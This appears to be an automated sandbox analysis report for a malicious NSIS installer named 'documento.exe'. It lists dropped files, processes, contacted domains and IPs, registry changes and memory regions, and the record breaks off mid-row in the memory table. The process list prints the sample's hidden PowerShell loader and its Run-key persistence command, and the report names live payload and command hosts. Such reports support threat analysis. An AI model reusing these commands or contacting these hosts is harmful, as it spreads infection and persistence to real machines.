Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
documento.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry
|
ASCII text, with very long lines (57843), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\1tvwxxbc.uq0.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\chatrum.sag
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Konservatorier.Paa
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\hektowattens.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fb53bhiv.doo.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\joefz3jg.x0w.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\k5sib43s.z3j.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nxjimhd4.o1x.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\r5ifwb5w.l2g.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rpm5w0gg.41f.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\to21uc1n.hla.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\vdb0uukp.cx1.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xpryghvs.t4f.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11HJN6AE1PGM5W0V1Q92.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZONHH8O5SKF4P1ZUPDII.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b41c2.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\Documents\Illoyalitet.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\documento.exe
|
"C:\Users\user\Desktop\documento.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
($Preeternal)
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
($Preeternal)
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle
minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
learfo55ozj01.duckdns.org
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://go.microsoB
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://ricohltd.top/ELFpBDmh152.bin
|
104.21.60.38
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
https://ricohltd.top/
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
learfo55ozj01.duckdns.org
|
192.169.69.26
|
||
learfo55ozj02.duckdns.org
|
unknown
|
||
ricohltd.top
|
104.21.60.38
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.169.69.26
|
learfo55ozj01.duckdns.org
|
United States
|
||
104.21.60.38
|
ricohltd.top
|
United States
|
||
172.67.191.112
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Divan180
|
culturize
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{BD84B380-8CA2-1069-AB1D-08000948F534} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Font Management\Auto Activation Languages
|
en-Latn-US
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Font Management
|
Inactive Fonts
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Font Management
|
Active Languages
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{93412589-74D4-4E4E-AD0E-E0CB621440FD} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
|
@fontext.dll,-8007
|
||
HKEY_CURRENT_USER\Software\Betvingelse
|
fataliteter
|
||
HKEY_CURRENT_USER\Morassweed
|
Herbalize
|
||
HKEY_CURRENT_USER\Environment
|
knkbrdet
|
||
HKEY_CURRENT_USER\Software\alpwovnb-G3F5OR
|
exepath
|
||
HKEY_CURRENT_USER\Software\alpwovnb-G3F5OR
|
licence
|
||
HKEY_CURRENT_USER\Software\alpwovnb-G3F5OR
|
time
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 14 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
449000
|
heap
|
page read and write
|
||
85E1000
|
direct allocation
|
page execute and read and write
|
||
839B000
|
direct allocation
|
page execute and read and write
|
||
83F1000
|
direct allocation
|
page execute and read and write
|
||
A7E000
|
stack
|
page read and write
|
||
3904000
|
heap
|
page read and write
|
||
4D6F000
|
stack
|
page read and write
|
||
B80000
|
trusted library allocation
|
page execute and read and write
|
||
4570000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
53F0000
|
heap
|
page read and write
|
||
3A2000
|
heap
|
page read and write
|
||
5D50000
|
heap
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
89000
|
stack
|
page read and write
|
||
208D000
|
stack
|
page read and write
|
||
42A0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3F60000
|
trusted library allocation
|
page read and write
|
||
4470000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3958000
|
heap
|
page read and write
|
||
8D0000
|
trusted library allocation
|
page read and write
|
||
993000
|
trusted library allocation
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
21B1F000
|
stack
|
page read and write
|
||
20CC1000
|
heap
|
page read and write
|
||
1ED0000
|
heap
|
page read and write
|
||
21780000
|
heap
|
page read and write
|
||
2118D000
|
stack
|
page read and write
|
||
90F000
|
stack
|
page read and write
|
||
489B000
|
remote allocation
|
page execute and read and write
|
||
2197F000
|
stack
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
100000
|
trusted library section
|
page read and write
|
||
431F000
|
stack
|
page read and write
|
||
2157F000
|
stack
|
page read and write
|
||
50CF000
|
stack
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
217000
|
stack
|
page read and write
|
||
4441000
|
trusted library allocation
|
page read and write
|
||
30000
|
heap
|
page read and write
|
||
8E0000
|
trusted library allocation
|
page read and write
|
||
480000
|
direct allocation
|
page read and write
|
||
3FA000
|
heap
|
page read and write
|
||
716000
|
heap
|
page execute and read and write
|
||
20F7F000
|
stack
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
1EA000
|
trusted library allocation
|
page read and write
|
||
B0000
|
direct allocation
|
page read and write
|
||
A1D000
|
stack
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
AE0000
|
heap
|
page execute and read and write
|
||
5D9F000
|
stack
|
page read and write
|
||
3DE000
|
stack
|
page read and write
|
||
4A4B000
|
stack
|
page read and write
|
||
2A9B000
|
remote allocation
|
page execute and read and write
|
||
4BFD000
|
stack
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
2147F000
|
stack
|
page read and write
|
||
274000
|
heap
|
page read and write
|
||
23F0000
|
trusted library allocation
|
page read and write
|
||
61DF000
|
stack
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
22F8000
|
heap
|
page read and write
|
||
32B000
|
heap
|
page read and write
|
||
AEE000
|
stack
|
page read and write
|
||
3D4000
|
heap
|
page read and write
|
||
42E0000
|
trusted library allocation
|
page read and write
|
||
20E50000
|
heap
|
page read and write
|
||
24E0000
|
trusted library allocation
|
page read and write
|
||
F0000
|
heap
|
page read and write
|
||
4B3F000
|
stack
|
page read and write
|
||
28AB000
|
trusted library allocation
|
page read and write
|
||
20CCD000
|
heap
|
page read and write
|
||
933000
|
trusted library allocation
|
page execute and read and write
|
||
51DB000
|
stack
|
page read and write
|
||
4E7E000
|
stack
|
page read and write
|
||
790000
|
trusted library allocation
|
page read and write
|
||
17A000
|
trusted library allocation
|
page execute and read and write
|
||
249E000
|
stack
|
page read and write
|
||
40A000
|
heap
|
page read and write
|
||
270000
|
direct allocation
|
page read and write
|
||
16A000
|
trusted library allocation
|
page read and write
|
||
4404000
|
heap
|
page execute and read and write
|
||
2164E000
|
stack
|
page read and write
|
||
407000
|
heap
|
page read and write
|
||
6610000
|
heap
|
page read and write
|
||
431000
|
heap
|
page read and write
|
||
734000
|
heap
|
page execute and read and write
|
||
636000
|
heap
|
page read and write
|
||
20EEE000
|
stack
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
2048000
|
trusted library allocation
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
22ED000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
5130000
|
heap
|
page read and write
|
||
442000
|
heap
|
page read and write
|
||
2220000
|
direct allocation
|
page read and write
|
||
44B6000
|
heap
|
page execute and read and write
|
||
10000
|
heap
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
4350000
|
trusted library allocation
|
page execute and read and write
|
||
AC0000
|
trusted library allocation
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
3799000
|
trusted library allocation
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
2771000
|
trusted library allocation
|
page read and write
|
||
529B000
|
remote allocation
|
page execute and read and write
|
||
42F000
|
heap
|
page read and write
|
||
1A3000
|
trusted library allocation
|
page execute and read and write
|
||
6197000
|
heap
|
page read and write
|
||
211BF000
|
stack
|
page read and write
|
||
4B04000
|
heap
|
page read and write
|
||
BB000
|
stack
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
20FFD000
|
stack
|
page read and write
|
||
2E3000
|
trusted library allocation
|
page read and write
|
||
2D4000
|
trusted library allocation
|
page read and write
|
||
435E000
|
stack
|
page read and write
|
||
5EB4000
|
heap
|
page read and write
|
||
2C1A000
|
trusted library allocation
|
page read and write
|
||
A1D000
|
stack
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
4D0D000
|
heap
|
page read and write
|
||
210000
|
trusted library allocation
|
page execute and read and write
|
||
2C7000
|
heap
|
page read and write
|
||
AF0000
|
trusted library allocation
|
page read and write
|
||
5410000
|
heap
|
page read and write
|
||
4880000
|
trusted library allocation
|
page read and write
|
||
211FF000
|
stack
|
page read and write
|
||
393E000
|
heap
|
page read and write
|
||
500000
|
trusted library allocation
|
page execute and read and write
|
||
4AFE000
|
stack
|
page read and write
|
||
4A40000
|
trusted library allocation
|
page execute and read and write
|
||
21020000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
557000
|
heap
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
3B7000
|
heap
|
page read and write
|
||
4B94000
|
heap
|
page read and write
|
||
512D000
|
heap
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
440000
|
trusted library allocation
|
page read and write
|
||
390000
|
trusted library allocation
|
page read and write
|
||
42E0000
|
direct allocation
|
page read and write
|
||
228F000
|
stack
|
page read and write
|
||
4D3E000
|
stack
|
page read and write | page guard
|
||
80000
|
direct allocation
|
page read and write
|
||
2191C000
|
stack
|
page read and write
|
||
A4F000
|
stack
|
page read and write
|
||
130000
|
trusted library section
|
page read and write
|
||
43F000
|
heap
|
page read and write
|
||
1C5000
|
trusted library allocation
|
page execute and read and write
|
||
3D80000
|
heap
|
page read and write
|
||
A1E000
|
stack
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
A0D000
|
stack
|
page read and write
|
||
C6000
|
heap
|
page read and write
|
||
4F2D000
|
stack
|
page read and write
|
||
3E5000
|
heap
|
page read and write
|
||
9A0000
|
trusted library allocation
|
page read and write
|
||
4DBE000
|
stack
|
page read and write
|
||
2129C000
|
stack
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
180000
|
direct allocation
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
360000
|
heap
|
page read and write
|
||
2F8000
|
heap
|
page read and write
|
||
4430000
|
trusted library allocation
|
page read and write
|
||
42B0000
|
trusted library allocation
|
page execute and read and write
|
||
2EE000
|
stack
|
page read and write | page guard
|
||
4340000
|
direct allocation
|
page read and write
|
||
265E000
|
stack
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
204E000
|
trusted library allocation
|
page read and write
|
||
2450000
|
trusted library allocation
|
page read and write
|
||
93D000
|
trusted library allocation
|
page execute and read and write
|
||
3E7000
|
heap
|
page read and write
|
||
4450000
|
trusted library allocation
|
page read and write
|
||
1BC000
|
stack
|
page read and write
|
||
4AE0000
|
heap
|
page read and write
|
||
2F8B000
|
heap
|
page read and write
|
||
4AFD000
|
heap
|
page read and write
|
||
3AD0000
|
heap
|
page read and write
|
||
1B0000
|
direct allocation
|
page read and write
|
||
49BC000
|
stack
|
page read and write
|
||
1A0000
|
trusted library allocation
|
page read and write
|
||
4330000
|
direct allocation
|
page read and write
|
||
26A0000
|
trusted library allocation
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
3084000
|
trusted library allocation
|
page read and write
|
||
225F000
|
stack
|
page read and write
|
||
4300000
|
trusted library allocation
|
page read and write
|
||
220E000
|
stack
|
page read and write
|
||
25B0000
|
trusted library allocation
|
page read and write
|
||
B78000
|
heap
|
page read and write
|
||
1A0000
|
direct allocation
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
2149F000
|
stack
|
page read and write
|
||
20F4E000
|
stack
|
page read and write
|
||
3A0000
|
trusted library allocation
|
page read and write
|
||
320000
|
trusted library allocation
|
page read and write
|
||
42C0000
|
direct allocation
|
page read and write
|
||
2121C000
|
stack
|
page read and write
|
||
110000
|
trusted library allocation
|
page read and write
|
||
277000
|
heap
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
44B0000
|
heap
|
page execute and read and write
|
||
43A0000
|
direct allocation
|
page read and write
|
||
3C0000
|
trusted library section
|
page read and write
|
||
4530000
|
trusted library allocation
|
page execute and read and write
|
||
AED000
|
stack
|
page read and write
|
||
209B000
|
remote allocation
|
page execute and read and write
|
||
5F30000
|
heap
|
page read and write
|
||
2A9B000
|
remote allocation
|
page execute and read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
48A1000
|
trusted library allocation
|
page read and write
|
||
276C000
|
stack
|
page read and write
|
||
2AF000
|
heap
|
page read and write
|
||
354000
|
heap
|
page read and write
|
||
61E0000
|
heap
|
page read and write
|
||
576E000
|
stack
|
page read and write
|
||
380000
|
trusted library allocation
|
page execute and read and write
|
||
29A000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
2171E000
|
stack
|
page read and write
|
||
6F9B000
|
direct allocation
|
page execute and read and write
|
||
3ED000
|
heap
|
page read and write
|
||
1F90000
|
remote allocation
|
page execute and read and write
|
||
50D9000
|
heap
|
page read and write
|
||
DB000
|
stack
|
page read and write
|
||
4FFF000
|
stack
|
page read and write
|
||
349B000
|
remote allocation
|
page execute and read and write
|
||
10000
|
heap
|
page read and write
|
||
190000
|
direct allocation
|
page read and write
|
||
4360000
|
direct allocation
|
page read and write
|
||
509F000
|
stack
|
page read and write
|
||
1B0000
|
trusted library allocation
|
page read and write
|
||
4770000
|
trusted library allocation
|
page execute and read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
4390000
|
direct allocation
|
page read and write
|
||
6A0000
|
remote allocation
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
209B000
|
remote allocation
|
page execute and read and write
|
||
409000
|
unkown
|
page write copy
|
||
990000
|
trusted library allocation
|
page read and write
|
||
B0000
|
trusted library section
|
page read and write
|
||
20D01000
|
heap
|
page read and write
|
||
33E000
|
heap
|
page read and write
|
||
407000
|
heap
|
page read and write
|
||
425000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page execute and read and write
|
||
26C0000
|
trusted library allocation
|
page read and write
|
||
4420000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
4930000
|
trusted library allocation
|
page read and write
|
||
391E000
|
heap
|
page read and write
|
||
331000
|
heap
|
page read and write
|
||
21407000
|
heap
|
page read and write
|
||
200000
|
trusted library allocation
|
page read and write
|
||
A0000
|
direct allocation
|
page read and write
|
||
47EE000
|
stack
|
page read and write
|
||
20F3E000
|
stack
|
page read and write
|
||
5081000
|
heap
|
page read and write
|
||
2156F000
|
stack
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
2550000
|
trusted library allocation
|
page read and write
|
||
F0000
|
trusted library section
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
4D1000
|
heap
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
41F000
|
heap
|
page read and write
|
||
340000
|
direct allocation
|
page read and write
|
||
87E000
|
stack
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
2187C000
|
stack
|
page read and write
|
||
253F000
|
stack
|
page read and write
|
||
257E000
|
stack
|
page read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
44D4000
|
heap
|
page execute and read and write
|
||
3C0000
|
trusted library allocation
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
20CA0000
|
heap
|
page read and write
|
||
20E20000
|
remote allocation
|
page read and write
|
||
4EEB000
|
stack
|
page read and write
|
||
3958000
|
heap
|
page read and write
|
||
276E000
|
stack
|
page read and write | page guard
|
||
407000
|
unkown
|
page readonly
|
||
4F9F000
|
stack
|
page read and write
|
||
1F90000
|
remote allocation
|
page execute and read and write
|
||
2175E000
|
stack
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
329000
|
trusted library allocation
|
page read and write
|
||
4450000
|
trusted library allocation
|
page read and write
|
||
4550000
|
direct allocation
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
2040000
|
trusted library allocation
|
page read and write
|
||
91E000
|
stack
|
page read and write
|
||
1BA000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
2D8000
|
trusted library allocation
|
page read and write
|
||
38F4000
|
heap
|
page read and write
|
||
AAE000
|
stack
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
A20000
|
trusted library allocation
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
430000
|
trusted library allocation
|
page execute and read and write
|
||
29E000
|
heap
|
page read and write
|
||
2240000
|
direct allocation
|
page read and write
|
||
618D000
|
stack
|
page read and write
|
||
25BE000
|
stack
|
page read and write
|
||
4EEE000
|
stack
|
page read and write | page guard
|
||
21C3D000
|
stack
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
54BD000
|
stack
|
page read and write
|
||
2AE000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
AC0000
|
trusted library allocation
|
page read and write
|
||
62E8000
|
heap
|
page read and write
|
||
21A0000
|
trusted library allocation
|
page read and write
|
||
2134E000
|
stack
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
30C000
|
heap
|
page read and write
|
||
1E0000
|
direct allocation
|
page read and write
|
||
83A0000
|
direct allocation
|
page execute and read and write
|
||
53DF000
|
stack
|
page read and write
|
||
2127E000
|
stack
|
page read and write
|
||
10D000
|
stack
|
page read and write
|
||
2A6B000
|
trusted library allocation
|
page read and write
|
||
220000
|
trusted library allocation
|
page read and write
|
||
4EEF000
|
stack
|
page read and write
|
||
110000
|
direct allocation
|
page read and write
|
||
24AF000
|
stack
|
page read and write
|
||
3299000
|
trusted library allocation
|
page read and write
|
||
2030000
|
trusted library allocation
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
7A07000
|
trusted library allocation
|
page read and write
|
||
21C8D000
|
stack
|
page read and write
|
||
550E000
|
stack
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
213EA000
|
heap
|
page read and write
|
||
90000
|
direct allocation
|
page read and write
|
||
260000
|
heap
|
page read and write
|
||
2125E000
|
stack
|
page read and write
|
||
2117F000
|
stack
|
page read and write
|
||
2110000
|
heap
|
page read and write
|
||
229A000
|
heap
|
page read and write
|
||
1CA000
|
trusted library allocation
|
page execute and read and write
|
||
220000
|
direct allocation
|
page read and write
|
||
1D70000
|
heap
|
page read and write
|
||
4ADB000
|
stack
|
page read and write
|
||
5D5000
|
heap
|
page read and write
|
||
4320000
|
direct allocation
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
5160000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2020000
|
trusted library allocation
|
page read and write
|
||
61A3000
|
heap
|
page read and write
|
||
245C000
|
stack
|
page read and write
|
||
11C000
|
stack
|
page read and write
|
||
5CF0000
|
heap
|
page read and write
|
||
2109F000
|
stack
|
page read and write
|
||
B00000
|
heap
|
page execute and read and write
|
||
240000
|
heap
|
page read and write
|
||
260E000
|
stack
|
page read and write | page guard
|
||
202000
|
trusted library allocation
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
153000
|
trusted library allocation
|
page execute and read and write
|
||
213E0000
|
heap
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
1AD000
|
trusted library allocation
|
page execute and read and write
|
||
7B7000
|
trusted library allocation
|
page read and write
|
||
4E0E000
|
stack
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
20E8E000
|
stack
|
page read and write
|
||
297000
|
trusted library allocation
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
41F000
|
heap
|
page read and write
|
||
1C0000
|
direct allocation
|
page read and write
|
||
217AF000
|
stack
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
2B67000
|
trusted library allocation
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
388000
|
heap
|
page read and write
|
||
22F6000
|
heap
|
page read and write
|
||
289D000
|
stack
|
page read and write
|
||
20F0D000
|
stack
|
page read and write
|
||
A00000
|
trusted library allocation
|
page execute and read and write
|
||
2631000
|
trusted library allocation
|
page read and write
|
||
1D7000
|
stack
|
page read and write
|
||
5186000
|
heap
|
page read and write
|
||
2610000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
trusted library allocation
|
page read and write
|
||
4A50000
|
trusted library allocation
|
page read and write
|
||
20CE3000
|
heap
|
page read and write
|
||
52F2000
